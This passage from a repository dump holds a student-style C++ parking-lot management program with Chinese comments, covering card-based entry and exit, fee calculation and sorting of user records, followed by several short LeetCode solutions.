strcmp(user[loc].car1in,\"车辆未进入\")==0)\r\n\t\t\t\t\tstrcpy(user[loc].car2in,\"vip\");\r\n\t\t\t};\r\n\t\t\tsave(m);\r\n\t\t\tprintf(\"请进入!\");\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tfor(j=loc;j<m;j++) 
//删除过期用户\r\n\t\t\t{\r\n\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t};\r\n\t\t\tm=m-1;\r\n\t\t\tsave(m);\r\n\t\t\tloc=-1;\r\n\t\t\tprintf(\"您的用户卡因逾期未续费,已被注销。请办理临时卡进入.\\n\");\t\t\t\r\n\t\t}\r\n\t}\r\n\tif(!isFull() && loc==-1){\r\n\t\tprintf(\"办理临时卡请选择1,离开请选择0: \");\r\n\t\tscanf(\"%d\",&n);\r\n\t\tif(n==1)\r\n\t\t{ //临时卡只设置车牌号与进入时间,其余全为默认值\r\n\t\t\tstrcpy(user[m].id,\"temp\"); \r\n\t\t\tstrcpy(user[m].card,\"temp\");\r\n\t\t\tstrcpy(user[m].carid2,\"0\");\r\n\t\t\tstrcpy(user[m].car1in,time);\r\n\t\t\tstrcpy(user[m].car2in,\"无车辆\");\r\n\t\t\tstrcpy(user[m].carid1,sto);\r\n\t\t\tm=m+1;\r\n\t\t\tsave(m);\r\n\t\t\tprintf(\"\\n添加成功!\\n\");\r\n\t\t\tprintf(\"您可以进入!\");\r\n\t\t}\r\n\t\telse\r\n\t\t\tprintf(\"再见!\");\r\n\t}\r\n\telse if(isFull()){printf(\"用户已满!不能创建临时卡。\");}\r\n};\r\n\r\nvoid carout(){\r\n\tFILE* fp;\r\n int m=load();\r\n int i,j,flag,tag=0,hoursout,hoursin;\r\n char car[7],time[13],timo[7],timi[7],hourout[5],hourin[5];\r\n long vo,vi,pay;\r\n do\r\n\t{\r\n flag=1;\r\n printf(\"请输入车牌号:\"); // 输入离开的车牌号\r\n scanf(\"%s\",car);\r\n for(i=0;car[i]!='\\0' && flag;i++)\r\n {\r\n if(isalnum(car[i])==0)\r\n flag=0;\r\n }\r\n }while (!flag);\r\n\r\n\tdo\r\n\t{\r\n\t\tflag=1;\r\n\t\tprintf(\"请输入出场时间(省略':'精确到分):\");\t\t//读入正确时间\r\n\t\tscanf(\"%s\",time);\r\n\t\tif(strlen(time)!=12)\r\n\t\t\tflag=0;\r\n\t\tfor(i=0;time[i]!='\\0' && flag;i++)\r\n\t\t{\r\n\t\t\tif(isdigit(time[i])==0)\r\n\t\t\t\tflag=0;\r\n\t\t}\r\n\t}while(!flag);\r\n\r\n\tfor(i=0;i<m;i++)\t\t\t\t\t\t\t\t\t\t//检索该车牌的车主,并确定是车1还是车2\r\n\t{\r\n if(strcmp(user[i].carid1,car)==0)\r\n {\r\n tag=1;\r\n break;\r\n }\r\n else if(strcmp(user[i].carid2,car)==0)\r\n {\r\n tag=2;\r\n break;\r\n }\r\n }\r\n\tif(!tag)\r\n\t\tflag=0;\r\n\r\n\tif(flag)\r\n\t{\r\n\t\tstrncpy(timo,time+2,6);\r\n\t\tstrncpy(hourout,time+8,4);\r\n\t\tvo=atol(timo);\r\n\t\thoursout=atoi(hourout);\r\n\r\n\t\tif(strcmp(user[i].card,\"year\")==0) \r\n\t\t{// 年卡用户,如果出场时间未到有效截止期。对于vip状态的车,直接设置为车辆未进入;\t\t\t\r\n\t\t\tif(tag==1) // tag代表等待离开的是车主的几号车\r\n\t\t\t{\r\n\t\t\t\tif(strcmp(user[i].car1in,\"vip\")==0) \r\n\t\t\t\t{\r\n\t\t\t\t\tif(vo<user[i].valid)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy(user[i].car1in,\"车辆未进入\");\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\telse \r\n\t\t\t\t\t{ // 如果超过截止期,用出场日期到截止期的time差计费,如果另一辆车未进入,直接删除该用户,否则暂时保留\r\n\r\n\t\t\t\t\t\tpay=fee(user[i].valid,0,vo,hoursout);\r\n\t\t\t\t\t\tif(strcmp(user[i].car2in,\"无车辆\")==0 || strcmp(user[i].car2in,\"车辆未进场\")==0)\r\n\t\t\t\t\t\t{\tfor(j=i;j<m;j++) 
//删除过期用户\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\t\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t\tm=m-1;\r\n\t\t\t\t\t\t\tprintf(\"由于您的用户卡已到期,您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\t\r\n\t\t\t\t\t\t\tstrcpy(user[i].car1in,\"车辆未进入\");\r\n\t\t\t\t\t\t\tprintf(\"由于您的用户卡已到期,您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t};\r\n\t\t\t\t}\r\n\t\t\t\telse if(strcmp(user[i].car1in,\"vip\")!=0) // 对于非vip状态的用户,直接利用 time差 计费\r\n\t\t\t\t{\r\n\t\t\t\t\tstrncpy(timi,user[i].car1in+2,6);\r\n\t\t\t\t\tstrncpy(hourin,user[i].car1in+8,4);\r\n\t\t\t\t\tvi=atol(timi);\r\n\t\t\t\t\thoursin=atoi(hourin);\r\n\t\t\t\t\tpay=fee(vi,hoursin,vo,hoursout);\r\n\r\n\t\t\t\t\tif(vo<user[i].valid)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy(user[i].car1in,\"车辆未进入\");\r\n\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse \r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(strcmp(user[i].car2in,\"无车辆\")==0 || strcmp(user[i].car2in,\"车辆未进场\")==0)\r\n\t\t\t\t\t\t{\tfor(j=i;j<m;j++) //删除过期用户\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\t\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t\tm=m-1;\r\n\t\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\tstrcpy(user[i].car1in,\"车辆未进入\");\r\n\t\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\telse if(tag==2)\r\n\t\t\t{\r\n\t\t\t\tif(strcmp(user[i].car2in,\"vip\")==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tif(vo<user[i].valid)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy(user[i].car2in,\"车辆未进入\");\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tpay=fee(user[i].valid,0,vo,hoursout);\r\n\t\t\t\t\t\tif(strcmp(user[i].car1in,\"无车辆\")==0 || strcmp(user[i].car1in,\"车辆未进场\")==0)\r\n\t\t\t\t\t\t{\t\r\n\t\t\t\t\t\t\tfor(j=i;j<m;j++) 
//删除过期用户\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\t\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t\tm=m-1;\r\n\t\t\t\t\t\t\tprintf(\"由于您的用户卡已到期,您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tstrcpy(user[i].car2in,\"车辆未进入\");\r\n\t\t\t\t\t\t\tprintf(\"由于您的用户卡已到期,您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t};\r\n\t\t\t\t}\r\n\t\t\t\telse if(strcmp(user[i].car2in,\"vip\")!=0)\r\n\t\t\t\t{\r\n\t\t\t\t\tstrncpy(timi,user[i].car2in+2,6);\r\n\t\t\t\t\tstrncpy(hourin,user[i].car2in+8,4);\r\n\t\t\t\t\tvi=atol(timi);\r\n\t\t\t\t\thoursin=atoi(hourin);\r\n\t\t\t\t\tpay=fee(vi,hoursin,vo,hoursout);\r\n\r\n\t\t\t\t\tif(vo<user[i].valid)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy(user[i].car2in,\"车辆未进入\");\r\n\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(strcmp(user[i].car1in,\"无车辆\")==0 || strcmp(user[i].car1in,\"车辆未进场\")==0)\r\n\t\t\t\t\t\t{\t\r\n\t\t\t\t\t\t\tfor(j=i;j<m;j++) //删除过期用户\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\t\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t\tm=m-1;\r\n\t\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\tstrcpy(user[i].car2in,\"车辆未进入\");\r\n\t\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\telse if(strcmp(user[i].card,\"time\")==0) // 次卡未用完,操作同年卡\r\n\t\t{\r\n\t\t\tif(tag==1)\r\n\t\t\t{\r\n\t\t\t\tif(strcmp(user[i].car1in,\"vip\")==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tif(user[i].valid==1)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(strcmp(user[i].car2in,\"无车辆\")==0 || strcmp(user[i].car2in,\"车辆未进场\")==0)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tfor(j=i;j<m;j++) 
//删除过期用户\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\t\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t\tm=m-1;\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tuser[i].valid=user[i].valid-1;\r\n\t\t\t\t\t\t\tstrcpy(user[i].car1in,\"车辆未进入\");\t\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tuser[i].valid=user[i].valid-1;\r\n\t\t\t\t\t\tstrcpy(user[i].car1in,\"车辆未进入\");\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\r\n\t\t\t\telse if(strcmp(user[i].car1in,\"vip\")!=0)\r\n\t\t\t\t{\r\n\t\t\t\t\tstrncpy(timi,user[i].car1in+2,6);\r\n\t\t\t\t\tstrncpy(hourin,user[i].car1in+8,4);\r\n\t\t\t\t\tvi=atol(timi);\r\n\t\t\t\t\thoursin=atoi(hourin);\r\n\t\t\t\t\tpay=fee(vi,hoursin,vo,hoursout);\r\n\t\t\t\t\tif(user[i].valid==0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tfor(j=i;j<m;j++) //删除过期用户\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t\t\t\t};\r\n\t\t\t\t\t\tm=m-1;\r\n\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy(user[i].car1in,\"车辆未进入\");\r\n\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\telse if(tag==2)\r\n\t\t\t{\r\n\t\t\t\tif(strcmp(user[i].car2in,\"vip\")==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tif(user[i].valid==1)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(strcmp(user[i].car1in,\"无车辆\")==0 || strcmp(user[i].car1in,\"车辆未进场\")==0)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tfor(j=i;j<m;j++) //删除过期用户\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\t\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\t\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t\tm=m-1;\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tuser[i].valid=user[i].valid-1;\r\n\t\t\t\t\t\t\tstrcpy(user[i].car2in,\"车辆未进入\");\r\n\t\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tuser[i].valid=user[i].valid-1;\r\n\t\t\t\t\t\tstrcpy(user[i].car2in,\"车辆未进入\");\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\r\n\t\t\t\telse 
if(strcmp(user[i].car2in,\"vip\")!=0)\r\n\t\t\t\t{\r\n\t\t\t\t\tstrncpy(timi,user[i].car2in+2,6);\r\n\t\t\t\t\tstrncpy(hourin,user[i].car2in+8,4);\r\n\t\t\t\t\tvi=atol(timi);\r\n\t\t\t\t\thoursin=atoi(hourin);\r\n\t\t\t\t\tpay=fee(vi,hoursin,vo,hoursout);\r\n\r\n\t\t\t\t\tif(user[i].valid==0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tfor(j=i;j<m;j++) //删除过期用户\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t\t\t\t};\r\n\t\t\t\t\t\tm=m-1;\r\n\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy(user[i].car2in,\"车辆未进入\");\r\n\t\t\t\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\t\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\telse if(strcmp(user[i].card,\"temp\")==0)\r\n\t\t{\r\n\t\t\tstrncpy(timi,user[i].car1in+2,6);\r\n\t\t\tstrncpy(hourin,user[i].car1in+8,4);\r\n\t\t\tvi=atol(timi);\r\n\t\t\thoursin=atoi(hourin);\r\n\t\t\tpay=fee(vi,hoursin,vo,hoursout);\r\n\r\n\t\t\tfor(j=i;j<m;j++) //删除过期用户\r\n\t\t\t{\r\n\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t};\r\n\t\t\tm=m-1;\r\n\t\t\tprintf(\"您需要缴纳的费用为:%ld\\n\",pay);\r\n\t\t\tprintf(\"祝您一路顺风!\");\r\n\t\t}\r\n\t\tsave(m);\r\n\t}\r\n\telse\r\n\t\tprintf(\"未查找到该车辆!\");\r\n};\r\n\r\nbool cmp_id(USER a,USER b){return strcmp(a.id,b.id)<0;}\r\nbool cmp_card(USER a,USER b){return strcmp(a.card,b.card)<0;}\r\nbool cmp_v(USER a,USER b){return a.valid<b.valid;}\r\nbool cmp_car(USER a,USER b){return strcmp(a.carid1,b.carid1)<0;}\r\nbool cmp_in(USER a,USER b){return strcmp(a.car1in,b.car1in)<0;}\r\n\r\nvoid sort(){\r\n\tFILE* fp;\r\n\tint m=load();\r\n\tint i,j,k,s1,s2,flag;\r\n\tdo\r\n\t{\r\n\t\tprintf(\"1.用户ID 2.卡类型 3.有效日期/有效次数 4.车牌号 5.入场时间 6.放弃排序\\n\");\r\n\t printf(\"您要对那种字段排序?请输入其对应的代号:\");\r\n\t scanf(\"%d\",&s1);\r\n\t if(s1<1 || s1>6)\r\n\t\t{\r\n\t\t\tprintf(\"输入不合法,请重新输入:\");\r\n\t\t\tscanf(\"%d\",&s1);\r\n\t\t\tflag=0;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tflag=1;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}while(!flag);\r\n\r\n\tswitch(s1)\r\n\t{\r\n\tcase 1: // 按id排序\r\n\t\tstd::sort(user,user+m,cmp_id);\r\n\t\tbreak;\r\n\tcase 2: //按卡类型排序\r\n\t\tstd::sort(user,user+m,cmp_card);\r\n\t\tbreak;\r\n\tcase 3: //按有效期排序\r\n\t\tstd::sort(user,user+m,cmp_v);\r\n\t\tbreak;\r\n\tcase 4: // 按车牌号排序\r\n\t\tstd::sort(user,user+m,cmp_car);\r\n\t\tbreak;\r\n\tcase 5: // 按入场时间排序\r\n\t\tstd::sort(user,user+m,cmp_in);\r\n\t\tbreak;\r\n\tdefault:return;\r\n\t}\r\n\tprintf(\"降序排列选择1,升序排列选择2:\");\r\n\tscanf(\"%d\",&s2);\r\n\tif(s2==1)\r\n\t{\r\n\t\tfor(i=m-1;i>=0;i--){\r\n\t\t\tprintf(\"\\t%s,\\t%s,\\t%d,\\t%s,\\t%s,\\t%s,\\t%s\\n\",user[i].id,user[i].card,user[i].valid,user[i].carid1,user[i].carid2,user[i].car1in,user[i].car2in);\r\n\t\t}\r\n\t}\r\n\telse 
if(s2==2)\r\n\t{\r\n\t\tfor(i=0;i<m;i++)\r\n\t\t\tprintf(\"\\t%s,\\t%s,\\t%d,\\t%s,\\t%s,\\t%s,\\t%s\\n\",user[i].id,user[i].card,user[i].valid,user[i].carid1,user[i].carid2,user[i].car1in,user[i].car2in);\r\n\t};\r\n};\r\n\r\n\r\n" }, { "alpha_fraction": 0.5014641284942627, "alphanum_fraction": 0.5065885782241821, "avg_line_length": 24.30769157409668, "blob_id": "9763e12cee4897f6caa7391a59f669ebb85657a4", "content_id": "210156a721f0d350e7f36d5f1f99742cb86294ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1384, "license_type": "no_license", "max_line_length": 90, "num_lines": 52, "path": "/leetcode/leetcode938.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 938. 二叉搜索树的范围和\r\n\r\nstruct TreeNode {\r\n int val;\r\n TreeNode *left;\r\n TreeNode *right;\r\n TreeNode() : val(0), left(nullptr), right(nullptr) {}\r\n TreeNode(int x) : val(x), left(nullptr), right(nullptr) {}\r\n TreeNode(int x, TreeNode *left, TreeNode *right) : val(x), left(left), right(right) {}\r\n};\r\n\r\nclass Solution {\r\npublic:\r\n void midOrder(TreeNode *root,vector<int> &res){\r\n if(!root) return;\r\n midOrder(root->left, res);\r\n res.push_back(root->val);\r\n midOrder(root->right, res);\r\n }\r\n int rangeSumBST(TreeNode* root, int low, int high) {\r\n int cnt = 0;\r\n vector<int> vec;\r\n midOrder(root,vec);\r\n for(int i = 0; i < vec.size() && vec[i] <= high; i++){\r\n if(vec[i] >= low){\r\n cnt += vec[i];\r\n }\r\n }\r\n return cnt;\r\n }\r\n};\r\n\r\nclass Solution {\r\npublic:\r\n int cnt = 0, l, h;\r\n void midOrder(TreeNode *root){\r\n if(!root) return;\r\n midOrder(root->left);\r\n if(root->val >= l && root->val <= h){\r\n cnt += root->val;\r\n } else if(root->val > h) return;\r\n midOrder(root->right);\r\n }\r\n int rangeSumBST(TreeNode* root, int low, int high) {\r\n l = low, h = high;\r\n midOrder(root);\r\n return cnt;\r\n }\r\n};" }, { "alpha_fraction": 0.4268292784690857, "alphanum_fraction": 0.4481707215309143, "avg_line_length": 18.625, "blob_id": "04746ccc57a770036d9337946a961c2a595117b9", "content_id": "344e53b55392be5e4ab1aa67bfb7ceefea54c8dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 338, "license_type": "no_license", "max_line_length": 41, "num_lines": 16, "path": "/leetcode/leetcode344.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 344. 
反转字符串\r\n\r\nclass Solution {\r\npublic:\r\n void reverseString(vector<char>& s) {\r\n int size = s.size();\r\n for(int i = 0; i < size/2; i++){\r\n char c = s[i];\r\n s[i] = s[size-i-1];\r\n s[size-i-1] = c;\r\n }\r\n }\r\n};" }, { "alpha_fraction": 0.3904418349266052, "alphanum_fraction": 0.4138863980770111, "avg_line_length": 24.404762268066406, "blob_id": "4854f761625a9da358d54847eb0e18eca7d0e91f", "content_id": "7c84e2a4cbc6872e5b4a2562be681f28c1591610", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1117, "license_type": "no_license", "max_line_length": 59, "num_lines": 42, "path": "/leetcode/leetcode2.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 2.两数相加\r\n\r\nstruct ListNode {\r\n int val;\r\n ListNode *next;\r\n ListNode() : val(0), next(nullptr) {}\r\n ListNode(int x) : val(x), next(nullptr) {}\r\n ListNode(int x, ListNode *next) : val(x), next(next) {}\r\n};\r\n\r\nclass Solution {\r\npublic:\r\n ListNode* addTwoNumbers(ListNode* l1, ListNode* l2) {\r\n ListNode *head = nullptr, *temp = head;\r\n int carry = 0, sum = 0;\r\n while(l1 != nullptr || l2 != nullptr || carry == 1)\r\n {\r\n if(l1 != nullptr){\r\n sum += l1->val;\r\n l1 = l1->next;\r\n }\r\n if(l2 != nullptr){\r\n sum += l2->val;\r\n l2 = l2->next;\r\n }\r\n sum += carry;\r\n if(!head) {\r\n head = temp = new ListNode(sum%10);\r\n carry = sum/10;\r\n } else {\r\n temp->next = new ListNode(sum%10);\r\n carry = sum/10;\r\n temp = temp->next;\r\n }\r\n sum = 0;\r\n }\r\n return head;\r\n }\r\n};\r\n" }, { "alpha_fraction": 0.41961851716041565, "alphanum_fraction": 0.4291553199291229, "avg_line_length": 25.259260177612305, "blob_id": "4d50bacb15da514d08ed2bb375c2fd24a3c0ca80", "content_id": "5549e2b4d8771803bc6752e059814bad39b9f973", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 746, "license_type": "no_license", "max_line_length": 72, "num_lines": 27, "path": "/leetcode/leetcode819.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 819. 
